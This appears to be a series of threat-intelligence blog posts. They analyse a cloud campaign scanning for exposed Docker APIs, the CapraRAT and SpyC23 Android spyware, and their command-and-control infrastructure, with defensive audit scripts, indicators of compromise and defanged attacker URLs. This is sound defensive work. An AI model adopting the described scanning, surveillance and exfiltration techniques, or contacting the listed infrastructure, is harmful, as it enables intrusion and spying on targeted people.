Next, setupsomething checks if masscan, docker, and zgrab are installed. If not, the script downloads the dependencies from the attacker’s server, hosted at the URI: /bin/[bin_name].

The dAPIpwn function takes the following arguments:

  • IP range: collected from the C2 server at /gr.php
  • Ports: 2375, 2376 – respectively used for Docker unencrypted and encrypted communications
  • Rate: 500,000 packets per second

The function passes these arguments to masscan, which scans the specified IP ranges then passes the results to zgrab, which looks for http responses from the remote endpoint /v1.16/version. The output is filtered using grep to search for lines containing the strings 'ApiVersion' or 'client version 1.16'. Aqua also detailed a step in the attack chain that looks for misconfigured Docker daemons running version 1.16. Interestingly, a Shodan search revealed only apparent honeypot systems responding with these strings on the specified ports.

When a system is deemed vulnerable, the script calls back to the C2 using curl with the vulnerable IP address and port added to the request URI.

Embedded script that scans for vulnerable Docker instances

Conclusion

This campaign demonstrates the evolution of a seasoned cloud actor with familiarity across many technologies. The meticulous attention to detail indicates the actor has clearly experienced plenty of trial and error, shown in choices like serving the curl binary to systems that do not already have it. The actor has also improved the tool’s data formatting to enable more autonomous activity, which demonstrates a certain level of maturity and skill.

While AWS has long been in the crosshairs of many cloud-focused actors, the expansion to Azure and GCP credentials indicates there are other major contenders holding valuable data.

We believe this actor is actively tuning and improving their tools. Based on the tweaks observed across the past several weeks, the actor is likely preparing for larger scale campaigns. The lack of threats explicitly targeting Azure and GCP credentials up to this point means there are likely many fresh targets. The current focus on Docker is ultimately arbitrary: this actor has previously targeted other technologies and there are many other oft-forgotten vulnerable applications.

Organizations can prepare against these attacks by ensuring that applications are configured properly and patched as security fixes become available. Docker access should be restricted to suit your organization’s needs while reducing exposure from outside connections.
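The scanner described in the Propagation section is looking for exactly one thing: a Docker API answering on 2375 or 2376 to anyone who connects. The audit below shows what the advice about restricting Docker access means in a daemon configuration. It is an added example, not code from the report or from Docker: it reads the daemon.json keys hosts and tlsverify and the dockerd flags -H/--host and --tlsverify, all of which exist in Docker, and the weak and hardened configurations are constructed to put the exposed setting beside the corrected one.

```python
"""Audit a Docker daemon configuration for the exposure this campaign scans for.

Added example, not code from the report or from Docker. It understands the
real daemon.json keys (hosts, tlsverify) and dockerd flags (-H/--host,
--tlsverify); the two configurations below are CONSTRUCTED for illustration.
"""
import json
import shlex
from urllib.parse import urlsplit

# Constructed: the pattern the masscan/zgrab stage hunts for. An unencrypted
# TCP listener on every interface, no client certificate required.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed: remote access kept, but bound to one management address and
# gated by mutual TLS (tlsverify requires a client cert signed by tlscacert).
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def hosts_from_daemon_json(text):
    """Return (hosts, tlsverify) from a daemon.json document."""
    cfg = json.loads(text)
    return cfg.get("hosts", []), bool(cfg.get("tlsverify", False))


def hosts_from_cmdline(cmdline):
    """Return (hosts, tlsverify) from a dockerd command line, e.g. from
    `ps` output or a systemd unit's ExecStart."""
    args = shlex.split(cmdline)
    hosts, tlsverify = [], False
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if a.startswith("--host="):
            hosts.append(a.split("=", 1)[1])
        elif a.startswith("-H") and len(a) > 2:      # -Htcp://... form
            hosts.append(a[2:])
        elif a in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return hosts, tlsverify


def audit_listeners(hosts, tlsverify):
    """Return (listener, severity, reason) findings. Only tcp:// listeners
    are reachable over the network; unix:// and fd:// sockets are skipped."""
    findings = []
    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp":
            continue
        if not tlsverify:
            findings.append((h, "high", "TCP API reachable without TLS client authentication"))
        if u.hostname in (None, "", "0.0.0.0", "::"):
            findings.append((h, "medium", "listener bound to all interfaces"))
        if u.port == 2375 and tlsverify:
            findings.append((h, "low", "TLS enabled on the conventional plaintext port 2375"))
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_listeners(*hosts_from_daemon_json(doc)) or "no findings")
```

Run against a fleet, the "high" finding is the one that matters: a host that returns it would answer the campaign's /v1.16/version probe to any source address, and network filtering in front of the port is the only other control that changes that outcome.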

Indicators of Compromise

SHA1 Description
0e1805fd9efa6a1c3fe9adb3f34373a9dcc7fe19 run.sh
18d28ac44c5501f1768f0fc155ad38aa56610881 chattr ELF binary
27414df2f9a687db65d2bc5fed011a1f0f550417 aws.sh v3
2ed9517159b89af2518cf65a93f3377dea737138 UPX-packed Golang ELF binary that drops scanner script
37cb34a044c70d1acea5a3a91580b7bfc2a8e687 ELF binary, potentially Tsunami
3d6aaed47135090326780727fef57ce1c1573aa2 tmate.sh
5611cb5676556410981eefab70d0e2aced01dbc5 aws.sh v2
6123bbca11385f9a02f888b21a59155242a96aba user.sh
61da5d358df2e99ee174b22c4899dbbf903c76f0 aws.sh v5
63fe964140907470427e035bdba5230f6a302056 b.sh (Install script)
654be7302f4a3638929fe5e67f6f2739a1801b07 clean.sh
828960576e182ec3206f457a263f25ee0531edbb curl.full
863bf9617f82c9c595cc9b09e84a346a306060c2 Embedded script from binary with dAPIpwn function capability
8802f1bf8f83e354f14686fe79b5018cd36eb77f aws.sh v6
ac78d5c763e460db2137999b67b921e471a55e11 aws.sh v4
b13d62f15868900ab22c9429effdfb7939563926 aws.sh v7
c9edc82bc3ac344981231965bedec300fec31b1f xc3.sh
d79970f66a56f69667284c4c937f666758200ab4 grab.sh
dba0dcb8378d84abc8f7bf897825dd4f23e20e04 data.sh profiling script
eb3dff13ed97670e06649e8daaa6e4ab655477f6 aws.sh v1
f437aeac3721a0038c936bab5a2ac1ccdb0cf222 int.sh

Monero Wallet address, C3Pool XMR

43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U 

Domains

ap-northeast-1.compute.internal.anondns[.]net
everlost.anondns[.]net
silentbob.anondns[.]net
everfound.anondns[.]net

IPv4s

207.154.218.221
45.9.148.108

URLs

http[:]//silentbob.anondns.net/bin/chattr 
http[:]//silentbob.anondns.net/bin/a 
http[:]//silentbob.anondns.net/cmd/grab.sh 
http[:]//silentbob.anondns.net/cmd/clean.sh 
http[:]//silentbob.anondns.net/cmd/aws.sh 
http[:]//silentbob.anondns.net/cmd/xc3.sh 
http[:]//silentbob.anondns.net/bin/sysfix/curl.full 
http[:]//silentbob.anondns.net/insert/gscat.php 
http[:]//silentbob.anondns.net/insert/tmate.php 

CapraTube | Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones

18 September 2023 at 13:00

Executive Summary

  • SentinelLabs identified three Android application packages (APK) linked to Transparent Tribe’s CapraRAT mobile remote access trojan (RAT).
  • These apps mimic the appearance of YouTube, though they are less fully featured than the legitimate native Android YouTube application.
  • CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects.

Background

Transparent Tribe is a suspected Pakistani actor known for targeting military and diplomatic personnel in both India and Pakistan, with a more recent expansion to the Indian Education sector. Since 2018, reports have detailed the group’s use of what is now called CapraRAT, an Android framework that hides RAT features inside of another application. The toolset has been used for surveillance against spear-phishing targets privy to affairs involving the disputed region of Kashmir, as well as human rights activists working on matters related to Pakistan.

Transparent Tribe distributes Android apps outside of the Google Play Store, relying on self-run websites and social engineering to entice users to install a weaponized application. Earlier in 2023, the group distributed CapraRAT Android apps disguised as a dating service that conducted spyware activity.

One of the newly identified APKs reaches out to a YouTube channel belonging to Piya Sharma, which has several short clips of a woman in various locales. This APK also borrows the individual’s name and likeness. This theme suggests that the actor continues to use romance-based social engineering techniques to convince targets to install the applications, and that Piya Sharma is a related persona.

CapraRAT is a comprehensive RAT that provides the actors with the ability to harvest data on demand and exfiltrate it. Notable features include:

  • Recording with the microphone, front & rear cameras
  • Collecting SMS and multimedia message contents, call logs
  • Sending SMS messages, blocking incoming SMS
  • Initiating phone calls
  • Taking screen captures
  • Overriding system settings such as GPS & Network
  • Modifying files on the phone’s filesystem

App Analysis

CapraRAT is distributed as an Android APK. When the tool was initially named by Trend Micro, their research team noted that CapraRAT may be loosely based on the AndroRAT source code.

We performed static analysis on two YouTube-themed CapraRAT APKs:

  • 8beab9e454b5283e892aeca6bca9afb608fa8718 – yt.apk, uploaded to VirusTotal in July 2023
  • 83412f9d757937f2719ebd7e5f509956ab43c3ce – YouTube_052647.apk, uploaded to VirusTotal in August 2023

We also identified a third APK called Piya Sharma, the YouTube channel persona described earlier:

  • 14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma.apk, uploaded to VirusTotal in April 2023

The yt and YouTube APKs are disguised as YouTube, borrowing the YouTube icon.

Application icons on an Android device, including YouTube_052647.apk
Application icons, including the Piya Sharma app
YouTube_052647.apk displays the YouTube website when launched

The app requests several permissions. YouTube is an interesting choice for masquerading the app: some permissions, like microphone access, make sense for recording or search features. Other permissions–like the ability to send and view SMS–are less relevant to the expected app behaviors.

Permissions prompts during install of the weaponized YouTube app

Installation permissions requested by the Piya Sharma APK

When the app is launched, MainActivity’s load_web method launches a WebView object to load YouTube’s website. Because this loads within the trojanized CapraRAT app’s window, the user experience is different from the native YouTube app for Android and akin to viewing the YouTube page in a mobile web browser.

Smali snippet of the load_web method in MainActivity

Key Components

Because CapraRAT is a framework inserted into a variety of Android applications, the files housing malicious activity are often named and arranged differently depending on the app. The CapraRAT APKs we analyzed contain the following files:

Name yt.apk
Configuration com/media/gallery/service/settings
Version MSK-2023
Main com/media/gallery/service/MainActivity
Malicious Activity com/media/gallery/service/TPSClient

Name YouTube_052647.apk
Configuration com/Base/media/service/setting
Version A.F.U.3
Main com/Base/media/service/MainActivity
Malicious Activity com/Base/media/service/TCHPClient

Name Piya Sharma.apk
Configuration com/videos/watchs/share/setting
Version V.U.H.3
Main com/videos/watchs/share/MainActivity
Malicious Activity com/videos/watchs/share/TCPClient

CapraRAT’s configuration file, which is named interchangeably setting or settings, holds the default configuration information, as well as metadata like versioning. The CapraRAT version syntax seen in YouTube_052647.apk and Piya Sharma.apk–A.F.U.3 and V.U.H.3, respectively–matches the convention used to track Transparent Tribe’s Windows tool, CrimsonRAT. However, there is no tangible relationship between these version numbers and the C2 domains as we saw in CrimsonRAT.

Thanks to creative spelling and naming conventions, the RAT’s configuration provides consistent static detection opportunities, with each of the following present in the samples from earlier in 2023 as well:

  • is_phical
  • isCancl
  • isRealNotif
  • SERVERIP
  • smsMoniter
  • smsWhere
  • verion

MainActivity is responsible for driving the application’s key features. This activity sets persistence through the onCreate method which uses Autostarter, an open-source project with code that lets developers automatically launch an Android application. The TPSClient class is initialized as an object called mTCPService; then, this method calls the serviceRefresh method, which creates an alarm at the interval specified in the settings file’s timeForAlarm variable. In this example, the value 0xea60 is equal to 60,000 milliseconds, meaning the alarm and persistence launcher run once per minute.

The RAT’s core functionality is in an activity similar to the Extra_Class activity from the March 2023 samples reported by ESET. Henceforth, we call this activity TPSClient for simplicity. These files are rather large, decompiling to over 10,000 lines of Smali code. By comparison, the March versions’ equivalents have only about 8,000 lines.

TPSClient contains CapraRAT’s commands, which are invoked through the run method via a series of switch statements that map the string command to a related method.

The smsmons command logic inside the run method of TPSClient

Many of these commands have been documented in previous research, though there are several changes in these new versions. The hideApp method now checks if the system is running Android version 9 or earlier and if the mehiden variable in the setting(s) config file was set to False; if applicable, the app will be hidden from the user’s view. While similarities between CapraRAT and AndroRAT are seemingly minimal at this point in CapraRAT’s development, the AndroRAT source code documentation notes that the tool becomes unstable after Android version 9, so there are likely underlying changes to the OS that make this method behave differently depending on the OS version.

TPSClient has a method check_permissions() that is not in Extra_Class. This method checks the following series of Android permissions and generates a string with a True or False result for each:

  • READ_EXTERNAL_STORAGE
  • READ_CALL_LOG
  • CAMERA
  • READ_CONTACTS
  • ACCESS_FINE_LOCATION
  • RECORD_AUDIO
  • READ_PHONE_STATE

Interestingly, some other older versions contain this method, suggesting that the samples may be tailored for targets or are potentially developed from different branches.

C2 & Infrastructure

In CapraRAT’s configuration file, the SERVERIP variable contains the command-and-control (C2) server address, which can be a domain, IP address, or both. The C2 port is in hexadecimal Big Endian format; the human readable port can be obtained by converting into decimal, resulting in port 14862 for yt.apk, port 18892 for YouTube_052647.apk, and port 10284 for Piya Sharma.apk.

C2 configuration from yt.apk (left) and YouTube_052647.apk (right)

The shareboxs[.]net domain used by YouTube_052647.apk has been associated with Transparent Tribe since at least 2019. Interestingly, the ptzbubble[.]shop domain was registered the same week of ESET’s report outlining the group’s Android apps that leveraged other C2 domains.

The IP addresses associated with C2 from the two YouTube samples have Remote Desktop Protocol port 3389 open with the service identified as Windows Remote Desktop, indicating the group uses Windows Server infrastructure to host the CapraRAT C2 application. The Piya Sharma app’s C2 IP, 209[.]127.19.241, has a certificate with common name value WIN-P9NRMH5G6M8, a longstanding indicator associated with Transparent Tribe’s CrimsonRAT C2 servers.

84[.]46.251.145–the IP address hosting ptzbubble[.]shop domain–shows historical resolutions associated with Decoy Dog Pupy RAT DNS tunneling lookups. Any connection between these campaigns is unclear; it is plausible that a service hosted on this IP was infected by that campaign. Based on the query dates, the claudfront[.]net lookup was during the time the CapraRAT actor was using this IP address to host ptzbubble[.]shop, while a lookup to allowlisted[.]net was in December 2022, which was potentially before this actor started using the IP.

Resolution history for IP hosting ptzbubble[.]shop, 84[.]46.251.145

Conclusion

Transparent Tribe is a perennial actor with reliable habits. The relatively low operational security bar enables swift identification of their tools.

The group’s decision to make a YouTube-like app is a new addition to a known trend of the group weaponizing Android applications with spyware and distributing them to targets through social media.

Individuals and organizations connected to diplomatic, military, or activist matters in the India and Pakistan regions should evaluate defense against this actor and threat.

Defensive and preventative measures should include:

  • Do not install Android applications outside of the Google Play store.
  • Be wary of new social media applications advertised within social media communities.
  • Evaluate the permissions requested by an application, particularly an application you are not particularly familiar with. Do these permissions expose you to more risk than the potential benefit of the app?
  • Do not install a third-party version of an application already on your device.

CapraRAT malware is fully detected by SentinelOne’s Singularity Mobile solution.

Indicators of Compromise (IOC)

File Hashes – SHA1
14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma APK
83412f9d757937f2719ebd7e5f509956ab43c3ce – CapraRAT, YouTube_052647.apk
8beab9e454b5283e892aeca6bca9afb608fa8718 – CapraRAT, yt.apk

C2 Network Communications
newsbizshow.net
ptzbubble.shop
shareboxs.net

95[.]111.247.73
209[.]127.19.241

Arid Viper | APT’s Nest of SpyC23 Malware Continues to Target Android Devices

6 November 2023 at 16:13

Executive Summary

  • Arid Viper is an espionage-motivated cyber threat actor with Hamas-aligned interests. Arid Viper’s toolkit is multi-platform and includes the consistent use and development of mobile spyware since emerging in 2017.
  • Through 2022 and 2023, the actor has distributed SpyC23, an Android spyware family, through weaponized apps posing as Telegram or as a dating app called Skipped.
  • There are overlaps between recent SpyC23 versions and their 2017 predecessors, tying together several Arid Viper Android malware families.
  • Increased industry focus on Arid Viper is an extension of our continuing collective efforts to track threat actors engaged in the Israel-Hamas war. In this context, traditional cyberespionage activities are often enablers for on-the-ground operations and deserve additional scrutiny.

Background

The Arid Viper group has a long history of using mobile malware, including at least four Android spyware families and one short-lived iOS implant, Phenakite. The SpyC23 Android malware family has existed since at least 2019, though shared code between the Arid Viper spyware families dates back to 2017. It was first reported in 2020 by ESET in a campaign where the actor used a third-party app store to distribute weaponized Android packages (APK). That campaign featured several apps designed to mimic Telegram and Android application update managers.

Through 2022 and early 2023, Arid Viper developed several newer SpyC23 versions that share these themes: two apps mimic Telegram, while another is internally called APP-UPGRADE but is based on a romance-themed messaging app called Skipped Messenger. Cisco Talos recently reported on the history of Skipped Messenger, revealing that the once-benign dating application was likely passed from the original developer to the Arid Viper actor.

SentinelLabs compared these newer versions of SpyC23 to the earlier 2020 version, as well as several older Android spyware families associated with Arid Viper: GnatSpy, FrozenCell, and VAMP. Many changes have been made in SpyC23’s development; however, there are notable overlaps with these older families and the taxonomy is less distinct.

App Analysis

The theme of these applications centers on messaging and communications. We identified two distinct themes: one mimics Telegram, the other mimics a dating-themed app called Skipped Messenger. The group has previously relied on Telegram-themed messengers as well as romance-themed lures and apps.

Arid Viper often relies on social engineering to deliver malware, with pretexts that allow operators to engage closely with their intended victims. The social engineering approach is a boon for delivering Android malware, as there are many hurdles for the actor to overcome before a user successfully installs a malicious app. Working the installation flow into a social engineering pretext is likely more effective than expecting users to install spyware successfully without prompting.

There is a non-weaponized version of Skipped Messenger (SHA-1: 6e1867bd841f4dc16bef21b5a958eec7a6497c4e) that shares the same Firebase service hostname skippedtestinapp[.]firebaseio[.]com as the malicious version. As the Talos report noted, Skipped was originally a legitimate dating app. The Google Play store version was last updated in August 2021.

Skipped Messenger & Telegram app main screen

Like most malicious Android apps, these apps ask the user to enable permissions that facilitate spyware activities.

Skipped Messenger screens prompting the user to enable Accessibility features

The application permissions give a high degree of control over the device, including:

  • Accessing the phone’s location
  • Making calls without user interaction
  • Monitoring calls made by the user
  • Recording with the microphone, capturing audio output
  • Read & Write to storage
  • Read & Write to the Contacts list
  • Modifying network state
  • Collecting a list of accounts used on the device
  • Downloading files to the phone without user interaction
  • Launching Java archive (JAR) files as a Service
  • Reading notifications received on the device as well as any connected wearables
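
As an added example (not code from the original post, nor from the SpyC23 samples), the following Python script applies the permission check recommended above to a decoded AndroidManifest.xml, such as apktool produces. It flags the permissions that map to the capabilities listed, plus the two service bindings (accessibility and notification listener) that matter more than any ordinary permission. The manifest and the package name com.example.messenger are constructed for illustration; the permission constants are the standard Android ones.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"
PERMISSION_ATTR = f"{{{ANDROID_NS}}}permission"

# Permissions that map to the spyware capabilities described above.
# Any single one can be legitimate; the combination is what matters.
SPYWARE_PERMISSIONS = {
    "android.permission.ACCESS_FINE_LOCATION": "track location",
    "android.permission.CALL_PHONE": "place calls without interaction",
    "android.permission.READ_CALL_LOG": "monitor calls",
    "android.permission.READ_PHONE_STATE": "monitor calls",
    "android.permission.RECORD_AUDIO": "record microphone",
    "android.permission.READ_EXTERNAL_STORAGE": "read storage",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write storage",
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.WRITE_CONTACTS": "write contacts",
    "android.permission.CHANGE_NETWORK_STATE": "modify network state",
    "android.permission.GET_ACCOUNTS": "enumerate device accounts",
}

# Service bindings that grant far more than an ordinary permission does.
SENSITIVE_BINDINGS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE":
        "accessibility service (reads and drives the UI of other apps)",
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE":
        "notification listener (reads every notification, incl. wearables)",
}

def triage_manifest(manifest_xml: str) -> dict:
    """Return the spyware-grade permissions, sensitive service bindings and a
    simple score (permission hits + 2 per sensitive binding) for a manifest."""
    root = ET.fromstring(manifest_xml)
    requested = {el.get(NAME_ATTR) for el in root.iter("uses-permission")
                 if el.get(NAME_ATTR)}
    perms = {p: SPYWARE_PERMISSIONS[p] for p in sorted(requested)
             if p in SPYWARE_PERMISSIONS}
    bindings = {}
    for svc in root.iter("service"):          # iter() is recursive
        perm = svc.get(PERMISSION_ATTR)
        if perm in SENSITIVE_BINDINGS:
            bindings[svc.get(NAME_ATTR)] = SENSITIVE_BINDINGS[perm]
    return {
        "package": root.get("package"),
        "spyware_permissions": perms,
        "sensitive_bindings": bindings,
        "score": len(perms) + 2 * len(bindings),
    }

# Constructed manifest for illustration; not taken from any real APK.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.messenger">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <application>
    <service android:name=".NotifListener"
             android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"/>
    <service android:name=".AccService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    report = triage_manifest(SAMPLE_MANIFEST)
    for perm, why in report["spyware_permissions"].items():
        print(f"[perm]    {perm}: {why}")
    for svc, why in report["sensitive_bindings"].items():
        print(f"[service] {svc}: {why}")
    print("score:", report["score"])
```

Any single permission here can be legitimate for a messaging app; the score exists to surface the combination. An accessibility or notification-listener service in an app with no obvious need for one is a reason to stop before granting it anything.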

The developer employed anti-decompilation and anti-virtualization techniques to complicate analysis. Each of these APKs contains application code that is obfuscated. On emulated Android devices, the apps flash and repeatedly cycle through prompts even after the requested permissions have been granted.

Comparing these new versions with older SpyC23 variants, there is significant overlap in package names, which fortifies the relationship between the old and new versions. In the image below, the older version on the left houses malicious activity in the update.bbm package, and the version we discovered on the right houses similar subpackages in the apps.sklite.pacJava package.

Java subpackage names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)

The overlaps continue in the class names. The actor frequently names classes after people’s names, as outlined in the rc_cola/tas_ran_rc_col package structure.

Java class names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)

These applications are quite large, making analysis of each class impractical. Instead, we will focus on several interesting classes and methods.

ACCAPPService

This class handles some communications to the C2. Of note, the class contains code that pertains to the user uninstalling the application. The SendToServerTask subclass logs when the user is in a ‘dangerous’ menu and parses input containing the active menu name for the English words ‘apps’ or ‘applications’ as well as the Arabic word for ‘Applications’.

“User In Dangerous Menu” logging messages

Brodie

This class is responsible for much of the app’s upload request handling, acting as an interface between the app and the C2 server. Brodie contains a method named isProbablyArabic, suggesting again that these apps are used against Arabic-speaking targets.

isProbablyArabic method from Brodie class

CallRecService

This service enables the spyware’s call recording feature. The class is imported from an external native library, libcallrecfix.so, and runs as a service. The library is based on at least two open-source Android call recording projects, neither of which is actively maintained. This was implemented in 2020 and has been a staple of SpyC23 iterations since. The library is compiled separately for each of the app’s supported architectures.

checkRaw

This audio upload service has many of the same status logging strings and media recording parameters seen in older versions of Arid Viper’s Android toolsets, including FrozenCell, reported by Lookout in 2017, and VAMP, also reported by Palo Alto in 2017.

RcNewService class from FrozenCell (left) and checkRaw class from 2023 APP-UPGRADE version of SpyC23 (right)

Some elements of this audio recording code are present in GitHub repositories described as a teardown of the Telegram Android app. While this is potentially an adaptation of open-source software, the similarities between the SpyC23 APKs are consistent, and the external versions do not have the same variables or logging messages.

Moller

This class is notable because it contains code that spans back to much earlier versions of Arid Viper’s Android spyware. We identified a 2017 GnatSpy sample from Trend Micro’s Arid Viper reporting that shares the same upload functionality through a subclass JsDirService.

Panda

This class loads methods from external libraries libRoams.so and lib-uoil.so. The code imports several functions related to manufacturer-specific implementations, including Huawei, Oppo, and Xiaomi.

The Panda class imports methods from the open-source Gotev Android Upload Service, which was also used by the older versions of SpyC23, and from the OkHttp library to craft HTTP requests. When the onCreate method runs, it initializes the Gotev service, parses the C2 configuration values, and registers GarciaReceiver, a receiver that monitors for connection state changes and was also present in older versions.

onCreate method inside the Panda class

Like older versions of SpyC23, this class has logic to parse and decode the C2 server details from strings stored inside lib-uoil.so and related binaries. The strings are partially Base64-encoded, with an additional layer likely applied on top before the correct C2 server URIs can be parsed. The previous technique of dropping the strings before and after the hyphen remains, and a further substitution step replaces spaces and underscores with hyphens.

C2 Infrastructure

The C2 servers used by these apps continue the longstanding Arid Viper domain naming scheme of a hyphenated hostname that uses Western-sounding peoples’ names. The primary C2 servers are:

  • luis-dubuque[.]in – C2 domain used by APP-UPGRADE Skipped Messenger APK
  • danny-cartwright[.]firm[.]in – C2 domain used by com.teleram.app APK
  • conner-margie[.]com – C2 domain used by com.alied.santafi
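
The naming scheme above is regular enough to hunt for in DNS logs. The following Python heuristic is an added example, not from the original post or from any SentinelLabs tooling: it extracts the registrable label from each queried hostname, checks that it is two lowercase words joined by a hyphen, and checks that one word is a known first name and the other a known surname. The name lists, the suffix list and the Zeek-style log excerpt are all constructed for illustration; a real hunt would load a proper name dictionary and the Public Suffix List.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Constructed, deliberately small name lists. A real hunt would load a
# first-name and surname dictionary with thousands of entries.
FIRST_NAMES = {"luis", "danny", "conner", "kim", "sam"}
SURNAMES = {"dubuque", "cartwright", "margie", "jones", "lee"}

# Suffixes to strip before inspecting the registrable label. Constructed
# subset; use the Public Suffix List in production so that multi-label
# suffixes such as firm.in are handled correctly.
SUFFIXES = ("firm.in", "co.uk", "com", "in", "net", "org", "shop")

# Constructed Zeek-style dns.log excerpt: timestamp, source IP, query.
SAMPLE_DNS_LOG = """\
1699272000.123 10.0.0.5 luis-dubuque.in
1699272001.456 10.0.0.5 danny-cartwright.firm.in
1699272002.789 10.0.0.7 conner-margie.com
1699272003.000 10.0.0.7 well-known.com
1699272004.000 10.0.0.9 api.telegram.org
1699272005.000 10.0.0.9 kim-jones.co.uk
"""

NAME_PAIR_RE = re.compile(r"^[a-z]+-[a-z]+$")

def registrable_label(host: str) -> Optional[str]:
    """Return the label directly left of a known suffix, or None."""
    host = host.lower().rstrip(".")
    for suffix in sorted(SUFFIXES, key=len, reverse=True):  # longest first
        if host.endswith("." + suffix):
            return host[: -len(suffix) - 1].rsplit(".", 1)[-1]
    return None

def looks_like_name_pair(host: str) -> bool:
    """True when the registrable label is two hyphen-joined words and one is
    a known first name while the other is a known surname (either order)."""
    label = registrable_label(host)
    if not label or not NAME_PAIR_RE.match(label):
        return False
    first, second = label.split("-", 1)
    return (first in FIRST_NAMES and second in SURNAMES) or \
           (second in FIRST_NAMES and first in SURNAMES)

def hunt(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (source IP, query) pairs whose query matches the heuristic."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        _ts, src, query = fields[:3]
        if looks_like_name_pair(query):
            hits.append((src, query))
    return hits

if __name__ == "__main__":
    for src, query in hunt(SAMPLE_DNS_LOG.splitlines()):
        print(f"{src} -> {query}")
```

The last sample line, kim-jones.co.uk, is a deliberate false positive: plenty of legitimate sites are named after people, so this is a triage filter to pivot from, not a blocking rule. Combine hits with domain registration age, low prevalence across the fleet, and the client population (mobile devices in this campaign) before escalating.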

We have included additional network indicators associated with app features that are unique to the APKs analyzed, including Google Cloud project hostnames and Firebase messaging hostnames.

Conclusion

The discovery of these APKs demonstrates that Arid Viper continues to thrive in the mobile malware space. The dedication to anti-analysis and obfuscation suggests that the developers are aware of research analysis and have applied measures to deter it and remain under the radar. The presence of code from other Arid Viper Android spyware families in SpyC23 fortifies the connection between this group’s various iterations of tools. The resulting bloat from carrying over older versions of the spyware aids attribution in the complex mobile malware landscape that pervades the Middle East.

Arid Viper has historically targeted military personnel in the Middle East, as well as journalists and dissidents. The most recent versions of SpyC23 highlight the actor’s focus on Arabic speakers, which is an interesting development given the actor’s historical penchant for targeting Israeli military personnel with Android spyware.

Those who are at risk of being targeted by this group should avoid installing applications from outside of the Google Play Store. Everyone should remain wary when installing new apps from any source: does this app really need the permissions it requests? In the case of SpyC23 apps, there is a lengthy walkthrough with images guiding the user to accept an inordinate number of permissions.

SentinelLabs would like to thank the research team at Cisco Talos for their collaboration on this research.

Indicators of Compromise

SHA1 Notes
03448782d5b717b7ad1a13b1841119bc033f40dd Teleram /lib/mips/librealm-jni.so
12af178d20ec7e1294873304b0ea81b5fcfd6333 Teleram /lib/armeabi-v7a/librealm-jni.so
17ab647f3b7ccf15b82f51e19301e682f7e8c82a APP-UPGRADE /armeabi-v7a/libRoams.so
29814eacb12b53efcda496485765a30c3c2b589e Santafi /lib/x86_64/libsonsod.so
2f0895fa9e1a404da46f56ab13c131de1a0eac1e APP-UPGRADE /x86/libRoams.so
300fb7a0597519b99b6120d16666be9b29ee5508 APP-UPGRADE /x86_64/libcallrecfix.so
31ba9425007d17745bb6b44c85042dcbd15fe837 Santafi /lib/x86_64/libcallrecfix.so
46bfcb28cde424d0d11e5772c2683391b0f1491a com.teleram.app.apk a Telegram-themed APK
4f58d69c53685365a4b6df70eca6fa203e6ba674 APP-UPGRADE /x86_64/libRoams.so
532876649c027ebaea56604fbcd7ce909a8aa4e3 APP-UPGRADE /arm64-v8a/libcallrecfix.so
5476d52ab6f982bb29ba2ace0074e77523f9f655 APP-UPGRADE /x86/libcallrecfix.so
55c9c7a53c9468d365743f155b2af7e189586822 APP-UPGRADE /arm64-v8a/libRoams.so
5a238ade0b402c3dbef7c82406649f27ae6b479a Santafi /lib/x86/libcallrecfix.so
600442488eb9536c821188dfad9d59e987ff7a56 Santafi /lib/armeabi-v7a/libsonsod.so
6f68e8645b4b88d7608310b7736749368398914a Teleram /lib/x86/librealm-jni.so
793177ffe60030fefbe6a17361b266980f151fa4 Santafi /lib/arm64-v8a/libcallrecfix.so
893dae5ded7eb0a35e84867e62cbbb7e831aac97 Santafi /lib/arm64-v8a/libdalia.so
9c1c02a387b0aa59b09962f18e4873699d732019 Santafi /lib/armeabi-v7a/libcallrecfix.so
9d9696bc552dc5dbb4d925d0fb04f77018deef50 Teleram /lib/x86_64/librealm-jni.so
a610a05d6087bc1493e505fd4c1e4ef4b29697e3 com.alied.santafi.apk a Telegram-themed APK
a8937d38cc8edb9b2dfb1e6e1c5cad6f63ae0ecc APP-UPGRADE /x86/libuoil.so
